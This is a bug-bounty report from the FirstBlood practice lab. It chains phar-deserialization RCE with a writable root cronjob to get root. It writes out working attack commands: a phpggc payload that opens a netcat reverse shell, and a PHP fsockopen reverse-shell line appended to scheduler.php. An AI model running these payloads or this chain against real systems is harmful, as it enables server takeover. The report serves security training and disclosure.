FirstBlood-#916 — FirstBlood server Rooted!
This issue was discovered on FirstBlood v2.0.0 (issues patched)
On 2021-10-30, newrouge Level 3 reported:
Hey, I would like to report that it's possible to get
the root user on the FirstBlood server, due to some insecure cronjobs run by the root user over which the user fb-exec has write permission, so a low-privilege user can escalate to root by abusing them.
- As I mentioned in the report (https://www.bugbountyhunter.com/hackevents/report?id=622), it is possible to get RCE due to insecure deserialization by adding the phar:// stream handler to the path of the uploaded proof.
Upload a maliciously generated phar file to the server with the payload:
nc -e /bin/bash <YOUR_IP> <PORT>
./phpggc -pj test.jpg -o test.phar monolog/rce1 system "nc -e /bin/bash <ip> <port>"
Upload this file to the server, capture the proof request, and append the phar:// stream to the path.
Have your listener ready and send the request.
Now let's do some recon. We find another directory inside
Inside it we find that a cronjob is running on the server
Let's see what that
And the fb-exec user has write permission over that file.
Uhhh here we go again, Patrcie!
Let's put our php reverse shell in this scheduler.php file, and start a listener on another port on our local machine:
echo '$sock=fsockopen("<IP>",<PORT>);exec("/bin/sh -i <&3 >&3 2>&3");' >> scheduler.php
Now wait for a moment, and you will get a shell as the root user.
Thank you & sorry for the little meme, I hope that's ok :)
FirstBlood ID: 35
Vulnerability Type: RCE
A cronjob is set to execute the file /app/firstblood/scheduler.php every minute under the root user. This file is writable by the firstblood php pool user (fb-exec). The [checkproof bug] can be combined with this to obtain root privileges.